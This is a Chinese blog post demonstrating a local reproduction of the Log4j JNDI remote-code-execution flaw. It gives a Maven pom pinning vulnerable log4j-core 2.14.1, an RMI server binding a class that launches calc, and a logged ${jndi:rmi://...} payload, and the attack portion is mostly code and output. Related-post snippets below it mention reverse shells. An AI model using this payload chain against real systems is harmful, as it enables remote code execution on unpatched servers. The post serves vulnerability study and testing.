快速复现利用Log4j漏洞启动windows计算器

最新推荐文章于 2023-04-20 10:22:59 发布
最新推荐文章于 2023-04-20 10:22:59 发布
阅读量4k 收藏 1
点赞数
分类专栏: Maven Spring Java 文章标签: windows 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/java_augur/article/details/122005981
版权
Java 同时被 3 个专栏收录
24 篇文章 0 订阅
订阅专栏
Spring
23 篇文章 1 订阅
订阅专栏
Maven
9 篇文章 0 订阅
订阅专栏

了解关于漏洞的描述,可以参考Vulnerability Affecting Multiple Log4j Versions Permits RCE Exploit

根据文章描述,首先下载JDK1.8u102,不能高于这个版本。

通过如下pom.xml建立一个maven项目

<project xmlns="http://maven.apache.org/POM/4.0.0"
	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
	<modelVersion>4.0.0</modelVersion>
	<groupId>Log4jJNDI</groupId>
	<artifactId>Log4jJNDI</artifactId>
	<version>0.0.1-SNAPSHOT</version>
	<properties>
		<java.version>1.8</java.version>
	</properties>
	<dependencies>
		<!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
		<dependency>
			<groupId>org.apache.logging.log4j</groupId>
			<artifactId>log4j-core</artifactId>
			<version>2.14.1</version>
		</dependency>
	</dependencies>
	    <build>
    <plugins>
        <plugin>
        <groupId>org.apache.maven.plugins</groupId>
        <artifactId>maven-compiler-plugin</artifactId>
        <version>3.7.0</version>
        <configuration>
            <source>${java.version}</source>
            <target>${java.version}</target>
        </configuration>
        </plugin>
    </plugins>
    </build>
</project>

新建类Log4jServer,这个类用来注册一个远程类。代码如下:

package testLog4j;

import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;

public class Log4jServer {
	public static void main(String[] args) {
		try {
			LocateRegistry.createRegistry(1099);
			Registry registry = LocateRegistry.getRegistry();
			Reference evilObjReference = new Reference("testLog4j.EvilObj", "testLog4j.EvilObj", ".");
			ReferenceWrapper evilObjReferenceObjWrapper = new ReferenceWrapper(evilObjReference);
			registry.bind("evilObj", evilObjReferenceObjWrapper);

			System.out.println("Server is running at port: 1099");
		} catch (Exception e) {
			e.printStackTrace();
		}
	}
}

用于打开计算器的远程类代码如下:

package testLog4j;

public class EvilObj {
	static {
		try {
			Runtime.getRuntime().exec("calc");
		} catch (Exception e) {
			e.printStackTrace();
		}
	}

}

下面的LogTest类用于展示如何通过打印日志,来调用远程类,

package testLog4j;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LogTest {
	private static Logger logger = LogManager.getLogger("LogTest");

	public static void main(String[] args) {
		logger.info("your operation system is: {}", "${java:os}");
		logger.error("${jndi:rmi://127.0.0.1:1099/evilObj}");
	}
}

首先运行Log4jServer类,此时在端口1099提供远程类访问。

然后再运行LogTest, 在打印如下日志以后,windows下的计算机被成功打开。运行时需要设置参数-Dlog4j2.formatMsgNoLookups=false

 

12-17 22:15:42.331 [main] INFO  LogTest
your operation system is: Windows 10 10.0, architecture: amd64-64

12-17 22:15:42.334 [main] ERROR LogTest
${jndi:rmi://127.0.0.1:1099/evilObj}

Good Luck,

Cheers!

java_augur
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
适用于log4jWindows日志查看器-.NET开发
05-27
Logazmic Minilog的nlog日志查看器。 目前仅支持log4j xml布局。 核心基于Log2console。 在WPF中使用MahApps重写UI。地铁支持:侦听tcp / udp打开* .log4j f Logazmic Minilog日志查看器,用于nlog。 目前仅支持log4j xml布局。 核心基于Log2console。 在WPF中使用MahApps重写UI。地铁支持:侦听tcp / udp打开* .log4j文件拖放文件下载https://github.com/ihtfw/Logazmic/releases/latest/屏幕截图:设置NLog (http://nlog-project.org/):Xml配置
log4j.properties配置
04-25
log4j.properties配置
log4j2漏洞复现利用
热门推荐
一个程序员
01-31 3万+
log4j2
log4j2漏洞复现
yangyangrenren的专栏
12-17 1044
1、本地启动ldap服务 https://github.com/veracode-research/rogue-jndi 下载这个链接的源码进行编译 mvn package -DskipTests 启动命令: #这里172.19.60.23是我本地的ip java -jar target/RogueJndi-1.1.jar -c "calc" -n 172.19.60.23 说明:原作者这里使用过的是 calc,应该是在windows系统上实验的。在ubuntu以及mac上,使用calc是不行的。在ma
完整log4j漏洞复现
追风筝的摆渡人
12-30 2931
log4j2.X漏洞复现
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 3084
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
严重危害警告 Log4j 执行漏洞被公开
qq_53058639的博客
02-14 782
12 月 10 日凌晨,Apache 开源项目 Log4j2 的远程代码执行漏洞细节被公开,漏洞威胁等级为:严重。Log4j2 是一个基于 Java 的日志记录工具。它重写了 Log4j 框架,引入了大量丰富特性,让用户可以控制日志信息输送的目的地为控制台、文件、GUI 组件等。同时通过定义每一条日志信息的级别,让使用者能够更加细致地控制日志的生成过程。Log4j 是目前全球使用最广泛的 java 日志框架之一。
配置Log4j(很详细)
u011679955的博客
07-02 254
Log4J的配置文件(Configuration File)就是用来设置记录器的级别、存放器和布局的,它可接key=value格式的设置或xml格式的设置信息。通过配置,可以创建出Log4J的运行环境。1. 配置文件Log4J配置文件的基本格式如下: #配置根Loggerlog4j.rootLogger  =   [ level ]   ,  appenderName1 ,  appenderNa...
log4j反弹shell
qq_33834637的博客
04-25 4407
漏洞描述 Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。 本次远程代码执行漏洞正是由于组件存在 Java JNDI 注入漏洞:当程序将用户输入的数据记录到日志时,攻击者通过构造特殊请求,来触发 Apache
log4j漏洞复现
weixin_68647219的博客
04-20 4434
2021年12月8号爆出的log4j2的远程代码执行漏洞【cve-2021-44228】,堪称史诗级核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。
ArcGIS漏洞修补工具(Log4J
01-18
ArcGIS Enterprise 10.9.1及以下版本的 log4j 漏洞修补工具
Vue项目部署在Spring Boot出现页面空白问题的解决方案
java_augur的专栏
11-24 9475
网上流行的解决方案是将assetsPublicPath: '/'改成'./',下面说一下这个解决方案的弊端: 通常页面空白的问题出现大多数是由于Spring Boot端配置了server.servlet.context-path,上下文改变了css, js等文件的访问路径,文件无法加载导致index.html显示空白。'/'改成'./'是将绝对路径变为相对路径,可以动态适应Spring Boot...
jar missing问题处理方法
java_augur的专栏
05-22 6056
对于Spring Boot项目初始很容易遇到上百个jar missing问题,手工处理往往不现实,不要慌,主要是其中某一个jar包没有正确加载导致Maven等工具停止加载其它jar包,jar包没有正确加载一般有两种情况: 1 Maven repository包含的jar包,由于Spring Boot版本升级导致jar包加载错误,这时候需要到.m2/repository中删除未正确加载的jar包文...
前后端分离项目处理异常最佳实践方法推荐(vue, Java)
java_augur的专栏
07-29 5892
如何处理异常是项目中极为头痛的一件事,尤其是在前后端分离的项目中,Exception必须作为Restful来处理,这里包括如何避免处理Exception的代码分散在项目代码,这样对于异常处理的重构和多语言支持都会造成很大的麻烦;还包括如何正确定义异常信息,使得用户所看到的错误提示信息是有效的,而不是一些数据库的error-code, 或者是500的HTTP STATUS。 当异常能够作为JSON...
eclipse STS 建立Spring Cloud系列(Part 1):Eureka Service Registry Server Cluster
java_augur的专栏
07-18 4495
第一步 eclipse STS, File -&gt; New -&gt; Spring Starter Project, Type选择Maven, Packaging, Jar, 如果引入dev tool建议使用 java version 8. 第二步 添加依赖 第三步:添加两个profile文件, application-peer1.properties, application-...
log4j漏洞复现vulhub靶场
最新发布
08-14
要在 Vulhub 靶场中复现 log4j 漏洞,你可以按照以下步骤进行操作: 1. 安装 Docker 和 Docker Compose:确保你的系统已经安装了 Docker 和 Docker Compose 工具。 2. 克隆 Vulhub 仓库:在命令行中执行以下命令,将 Vulhub 项目克隆到本地: ``` $ git clone https://github.com/vulhub/vulhub.git $ cd vulhub ``` 3. 进入 log4j 漏洞环境目录:执行以下命令进入 log4j 漏洞环境的目录: ``` $ cd log4shell/CVE-2021-44228 ``` 4. 启动容器:执行以下命令启动容器,将漏洞环境运行起来: ``` $ docker-compose up -d ``` 5. 验证漏洞:容器启动后,你可以使用 curl 或浏览器访问 http://your-ip:8080/,将 "your-ip" 替换为容器所在主机的 IP 地址。如果返回的响应中包含 "Vulnerable" 字样,则表示漏洞存在。 请注意,这只是一个简单的漏洞环境复现示例,用于学习和实验目的。在实际情况中,你需要根据具体的情况和要求来进行漏洞测试和修复工作,并确保遵守法律和道德规范。另外,随着漏洞修复和漏洞利用工具的更新,复现步骤可能会有所变化。建议在复现之前先查阅相关的文档和资料。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值